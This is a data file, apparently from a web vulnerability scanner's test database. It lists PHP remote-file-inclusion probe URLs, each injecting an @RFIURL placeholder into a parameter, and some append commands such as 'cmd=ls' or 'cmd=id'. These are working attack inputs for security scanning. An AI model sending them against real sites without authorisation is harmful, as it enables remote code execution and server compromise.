"005110","5292","c","/index.php?lizge=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005111","5292","c","/index.php?lng=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005112","5292","c","/index.php?load=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005113","5292","c","/index.php?loadpage=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005114","5292","c","/index.php?main_tabid=1&main_content=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005115","5292","c","/index.php?may=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005116","5292","c","/index.php?middle=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005117","5292","c","/index.php?mode=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005118","5292","c","/index.php?mode=@RFIURL?&cmd=","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005119","5292","c","/index.php?modpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005120","5292","c","/index.php?module=PostWrap&page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005121","5292","c","/index.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005122","5292","c","/index.php?news7[\"functions\"]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005123","5292","c","/index.php?news_include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005124","5292","c","/index.php?open=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005125","5292","c","/index.php?option=com_custompages&cpage=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005126","5292","c","/index.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005127","5292","c","/index.php?page=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005128","5292","c","/index.php?page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005129","5292","c","/index.php?page@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005130","5292","c","/index.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005131","5292","c","/index.php?pagename=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005132","5292","c","/index.php?pager=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005133","5292","c","/index.php?pagina=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005134","5292","c","/index.php?path_to_folder=@RFIURL?cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005135","5292","c","/index.php?pg=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005136","5292","c","/index.php?pg=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005137","5292","c","/index.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005138","5292","c","/index.php?plugin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005139","5292","c","/index.php?principal=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005140","5292","c","/index.php?proMod=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005141","5292","c","/index.php?proMod=@RFIURL?cmd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005142","5292","c","/index.php?project=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005143","5292","c","/index.php?repinc=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005144","5292","c","/index.php?root_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005145","5292","c","/index.php?root_prefix=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005146","5292","c","/index.php?section=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005147","5292","c","/index.php?site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005148","5292","c","/index.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005149","5292","c","/index.php?styl[top]=@RFIURL??","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005150","5292","c","/index.php?template=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005151","5292","c","/index.php?templates_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005152","5292","c","/index.php?theme=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005153","5292","c","/index.php?themepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005154","5292","c","/index.php?themesdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005155","5292","c","/index.php?this_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005156","5292","c","/index.php?txt=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005157","5292","c","/index.php?up=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005158","5292","c","/index.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005159","5292","c","/index.php?w=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005160","5292","c","/index.php?way=@RFIURL??????????????","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005161","5292","c","/index1.php?=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005162","5292","c","/index1.php?inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005163","5292","c","/index1.php?inhalt=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005164","5292","c","/index2.php?=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005165","5292","c","/index2.php?content=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005166","5292","c","/index2.php?s=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005167","5292","c","/index2.php?x=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005168","5292","c","/indexinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005169","5292","c","/indexk.php?lib_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005170","5292","c","/info.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005171","5292","c","/inhalt.php?dateien[news]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005172","5292","c","/init.php?API_HOME_DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005173","5292","c","/init.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005174","5292","c","/initialize.php?hmail_config[includepath]=@RFIURL&cmd=dir","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005175","5292","c","/initiate.php?abs_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005176","5292","c","/install.php?_NE[AbsPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005177","5292","c","/install.php?install_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005178","5292","c","/install/config.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005179","5292","c","/install/di.php?pathtoserverdata=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005180","5292","c","/install/index.php?content_php=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005181","5292","c","/install/install3.php?database=none&cabsolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005182","5292","c","/integration/shortstat/configuration.php?SPL_CFG[dirroot]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005183","5292","c","/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005184","5292","c","/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005185","5292","c","/interface/billing/billing_process.php?srcdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005186","5292","c","/interface/editors/-custom.php?bField[bf_data]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005187","5292","c","/interface/editors/custom.php?bField[bf_data]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005188","5292","c","/interface/new/new_patient_save.php?srcdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005189","5292","c","/intern/admin/?rootdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005190","5292","c","/intern/admin/other/backup.php?admin=1&rootdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005191","5292","c","/intern/clan/member_add.php?rootdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005192","5292","c","/intern/config/forum.php?rootdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005193","5292","c","/intern/config/key_2.php?rootdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005194","5292","c","/ip.inc.php?type=1&cgipath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005195","5292","c","/ipeer_site/?page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005196","5292","c","/joinus.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005197","5292","c","/joinus.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005198","5292","c","/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005199","5292","c","/joomla_path/components/com_articles.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005200","5292","c","/js/bbcodepress/bbcode-form.php?BBCODE_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005201","5292","c","/js/wptable-tinymce.php?ABSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005202","5292","c","/jscript.php?my_ms[root]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005203","5292","c","/kernel/class/ixpts.class.php?IXP_ROOT_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005204","5292","c","/kernel/loadkernel.php?installPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005205","5292","c","/kmitaadmin/kmitam/htmlcode.php?file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005206","5292","c","/kmitaadmin/kmitat/htmlcode.php?file=@RFIURL? ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005207","5292","c","/ktmlpro/includes/ktedit/toolbar.php?dirDepth=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005208","5292","c","/lang/leslangues.php?fichier=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005209","5292","c","/lang_english/lang_main_album.php?phpbb_root_path=@RFIURL?a=","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005210","5292","c","/language/lang_english/lang_activity.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005211","5292","c","/language/lang_english/lang_admin_album.php?phpbb_root_path=@RFIURL?a=","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005212","5292","c","/language/lang_german/lang_admin_album.php?phpbb_root_path=@RFIURL?a=","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005213","5292","c","/language/lang_german/lang_main_album.php?phpbb_root_path=@RFIURL?a=","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005214","5292","c","/latestposts.php?forumspath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005215","5292","c","/latex.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005216","5292","c","/layout/default/params.php?gConf[dir][layouts]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005217","5292","c","/ldap/authldap.php?includePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005218","5292","c","/learnPath/include/scormExport.inc.php?includePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005219","5292","c","/lib.editor.inc.php?sys_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005220","5292","c","/lib/Loggix/Module/Calendar.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005221","5292","c","/lib/Loggix/Module/Comment.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005222","5292","c","/lib/Loggix/Module/Rss.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005223","5292","c","/lib/Loggix/Module/Trackback.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005224","5292","c","/lib/action/rss.php?lib=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005225","5292","c","/lib/activeutil.php?set[include_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005226","5292","c","/lib/addressbook.php?GLOBALS[basedir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005227","5292","c","/lib/armygame.php?libpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005228","5292","c","/lib/authuser.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005229","5292","c","/lib/base.php?BaseCfg[BaseDir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005230","5292","c","/lib/connect.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005231","5292","c","/lib/connected_users.lib.php3?ChatPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005232","5292","c","/lib/connected_users.lib.php3?ChatPath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005233","5292","c","/lib/db/mysql.class.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005234","5292","c","/lib/db/postgres.class.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005235","5292","c","/lib/functions.php?DOC_ROOT=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005236","5292","c","/lib/googlesearch/GoogleSearch.php?APP[path][lib]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005237","5292","c","/lib/header.php?DOC_ROOT=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005238","5292","c","/lib/language.php?_LIB_DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005239","5292","c","/lib/live_status.lib.php?ROOT=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005240","5292","c","/lib/misc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005241","5292","c","/lib/nl/nl.php?g_strRootDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005242","5292","c","/lib/obj/collection.class.php?GLOBALS[application][app_root]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005243","5292","c","/lib/obj/content_image.class.php?GLOBALS[application][app_root]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005244","5292","c","/lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005245","5292","c","/lib/pcltrace.lib.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005246","5292","c","/lib/rs.php?rootpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005247","5292","c","/lib/selectlang.php?BBC_LANGUAGE_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005248","5292","c","/lib/smarty/SmartyFU.class.php?system[smarty][dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005249","5292","c","/lib/smarty/SmartyFU.class.php?system[smarty][dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005250","5292","c","/lib/static/header.php?set_menu=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005251","5292","c","/lib/tpl.inc.php?conf[classpath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005252","5292","c","/libraries/comment/postComment.php?path[cb]=@RFIURL?a=","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005253","5292","c","/libraries/database.php?path=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005254","5292","c","/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005255","5292","c","/libraries/pcl/pcltar.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005256","5292","c","/library/authorize.php?login_form=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005257","5292","c","/library/translation.inc.php?GLOBALS[srcdir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005258","5292","c","/libs/db.php?path_local=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005259","5292","c","/libs/ftp.php?path_local=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005260","5292","c","/libs/lom.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005261","5292","c","/libsecure.php?abs_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005262","5292","c","/license.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005263","5292","c","/link_main.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005264","5292","c","/linkadmin.php?page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005265","5292","c","/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
